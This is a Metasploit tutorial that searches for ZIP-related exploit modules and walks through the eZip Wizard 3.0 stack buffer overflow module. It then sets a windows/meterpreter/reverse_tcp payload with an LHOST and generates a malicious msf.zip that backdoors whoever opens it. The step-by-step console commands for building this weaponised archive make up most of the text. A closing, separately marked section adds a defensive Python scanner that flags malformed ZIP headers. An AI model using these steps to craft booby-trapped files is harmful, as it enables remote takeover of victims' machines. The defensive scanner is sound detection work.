Metasploit local (file-format) exploits


This is simple to understand. "Local" here means client-side software such as RAR, ZIP tools, media players and so on: after we use MSF to generate a malicious file, anyone who opens it with that specific program gets the payload.

Open UB 1. Let's use ZIP: start Metasploit and search for zip.

msf > search zip
 
Matching Modules
================
 
   Name                                                     Disclosure Date  Rank       Description
   ----                                                     ---------------  ----       -----------
   auxiliary/admin/oracle/post_exploitation/win32upload     2005-02-10       normal     Oracle URL Download
   auxiliary/dos/wifi/netgear_ma521_rates                                    normal     NetGear MA521 Wireless Driver Long Rates Overflow
   auxiliary/dos/wifi/netgear_wg311pci                                       normal     NetGear WG311v1 Wireless Driver Long SSID Overflow
   exploit/multi/fileformat/peazip_command_injection        2009-06-05       excellent  PeaZip <= 2.6.1 Zip Processing Command Injection
   exploit/multi/http/splunk_mappy_exec                     2011-12-12       excellent  Splunk Search Remote Code Execution
   exploit/multi/wyse/hagent_untrusted_hsdata               2009-07-10       excellent  Wyse Rapport Hagent Fake Hserver Command Execution
   exploit/osx/browser/safari_metadata_archive              2006-02-21       excellent  Safari Archive Metadata Command Execution
   exploit/solaris/dtspcd/heap_noir                         2002-07-10       great      Solaris dtspcd Heap Overflow
   exploit/windows/browser/adobe_shockwave_rcsl_corruption  2010-10-21       normal     Adobe Shockwave rcsL Memory Corruption
   exploit/windows/browser/ms06_067_keyframe                2006-11-14       normal     Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability
   exploit/windows/browser/winzip_fileview                  2007-11-02       normal     WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow
   exploit/windows/driver/dlink_wifi_rates                  2006-11-13       low        D-Link DWL-G132 Wireless Driver Beacon Rates Overflow
   exploit/windows/fileformat/ezip_wizard_bof               2009-03-09       good       eZip Wizard 3.0 Stack Buffer Overflow
   exploit/windows/fileformat/real_networks_netzip_bof      2011-01-30       good       Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability
   exploit/windows/fileformat/scadaphone_zip                2011-09-12       good       ScadaTEC ScadaPhone <= v5.3.11.1230 Stack Buffer Overflow
   exploit/windows/fileformat/tugzip                        2008-10-28       good       TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability
   exploit/windows/ftp/3cdaemon_ftp_user                    2005-01-04       average    3Com 3CDaemon 2.0 FTP Username Overflow
   exploit/windows/ftp/easyftp_cwd_fixret                   2010-02-16       great      EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
   exploit/windows/http/hp_nnm_ovas                         2008-04-02       good       HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow
   exploit/windows/telnet/gamsoft_telsrv_username           2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
   exploit/windows/tftp/attftp_long_filename                2006-11-27       average    Allied Telesyn TFTP Server 1.9 Long Filename Overflow
 
 
msf > 

Take ezip_wizard_bof as the example: exploit/windows/fileformat/ezip_wizard_bof

msf > info exploit/windows/fileformat/ezip_wizard_bof
 
       Name: eZip Wizard 3.0 Stack Buffer Overflow
     Module: exploit/windows/fileformat/ezip_wizard_bof
    Version: 15014
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Good
 
Provided by:
  fl0 fl0w
  jduck <jduck@metasploit.com>
  Lincoln
 
Available targets:
  Id  Name
  --  ----
  0   Windows Universal
 
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.zip          yes       The output file name.
  USERNAME                   yes       Username
 
Payload information:
 
Description:
  This module exploits a stack-based buffer overflow vulnerability in 
  version 3.0 of ediSys Corp.'s eZip Wizard. In order for the command 
  to be executed, an attacker must convince someone to open a 
  specially crafted zip file with eZip Wizard, and access the 
  specially file via double-clicking it. By doing so, an attacker can 
  execute arbitrary code as the victim user.
 
References:
 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-1028
 
 
http://www.osvdb.org/52815
 
 
http://www.securityfocus.com/bid/34044
 
 
http://www.edisys.com/
 
 
http://www.exploit-db.com/exploits/8180
 
 
http://www.exploit-db.com/exploits/12059
 
msf > 

This is the eZip Wizard 3.0 local overflow. Let's generate the file:

msf  exploit(ezip_wizard_bof) > show options 
 
Module options (exploit/windows/fileformat/ezip_wizard_bof):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.zip          yes       The output file name.
   USERNAME                   yes       Username
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Windows Universal
 
 
msf  exploit(ezip_wizard_bof) > set USERNAME 
set USERNAME   
msf  exploit(ezip_wizard_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ezip_wizard_bof) > set USERNAME test
USERNAME => test
msf  exploit(ezip_wizard_bof) > set LHOST 5.5.5.5 
LHOST => 5.5.5.5
msf  exploit(ezip_wizard_bof) > exploit 
 
[*] Creating 'msf.zip' file...
[+] msf.zip stored at /root/.msf4/local/msf.zip
msf  exploit(ezip_wizard_bof) > 

Check the generated file:

root@root:~# file /root/.msf4/local/msf.zip
/root/.msf4/local/msf.zip: Zip archive data, at least v2.0 to extract
root@root:~# 

When someone opens it with eZip Wizard 3.0, our PAYLOAD (the backdoor) runs.
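As an added example (not from the original post), here is a defender-side triage script that walks the local file headers of a ZIP, the same "PK\x03\x04" records `file` reads when it reports "at least v2.0 to extract", and flags entries whose filename field is abnormally long or whose header claims more bytes than the archive contains. The 260-byte threshold and both sample archives are assumptions/constructed test data; the module description does not say which field eZip Wizard mishandles, so this is a generic malformed-archive check rather than a signature for that exploit.

```python
import io
import struct
import zipfile

LOCAL_HDR = b"PK\x03\x04"   # ZIP local file header signature
NAME_LIMIT = 260            # assumed triage threshold for entry-name length

def scan_zip_entries(data: bytes, name_limit: int = NAME_LIMIT) -> list:
    """Walk every local file header and report the name length, the
    'version needed to extract' field (what `file` prints as "v2.0")
    and a suspicious flag for oversized or truncated headers."""
    entries = []
    pos = data.find(LOCAL_HDR)
    while pos >= 0 and pos + 30 <= len(data):
        # sig(4) ver(2) flags(2) method(2) time(2) date(2) crc(4) csize(4) usize(4) nlen(2) xlen(2)
        ver, _flags, _method, _t, _d, _crc, csize, _usize, nlen, xlen = struct.unpack_from(
            "<HHHHHIIIHH", data, pos + 4)
        name_end = pos + 30 + nlen
        truncated = name_end + xlen > len(data)   # header claims more bytes than exist
        entries.append({
            "name": data[pos + 30:name_end].decode("latin-1", "replace")[:40],
            "name_len": nlen,
            "version_needed": f"{ver // 10}.{ver % 10}",
            "suspicious": nlen > name_limit or truncated,
        })
        # skip past name, extra field and stored/compressed data to the next header
        pos = data.find(LOCAL_HDR, name_end + xlen + csize)
    return entries

def benign_zip() -> bytes:
    """Constructed sample: a normal one-entry archive built with the stdlib."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "hello")
    return buf.getvalue()

def oversized_name_zip(n: int = 600) -> bytes:
    """Constructed sample: one stored entry whose name field is n bytes long."""
    name = b"A" * n
    hdr = LOCAL_HDR + struct.pack("<HHHHHIIIHH", 20, 0, 0, 0, 0, 0, 0, 0, len(name), 0)
    return hdr + name

if __name__ == "__main__":
    for label, blob in (("benign", benign_zip()), ("oversized", oversized_name_zip())):
        for e in scan_zip_entries(blob):
            print(label, e)
```

Run it against any archive dropped at a mail gateway or in a quarantine folder; a hit on `suspicious` is a reason to block the file from reaching a legacy archiver, not proof of a specific exploit.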
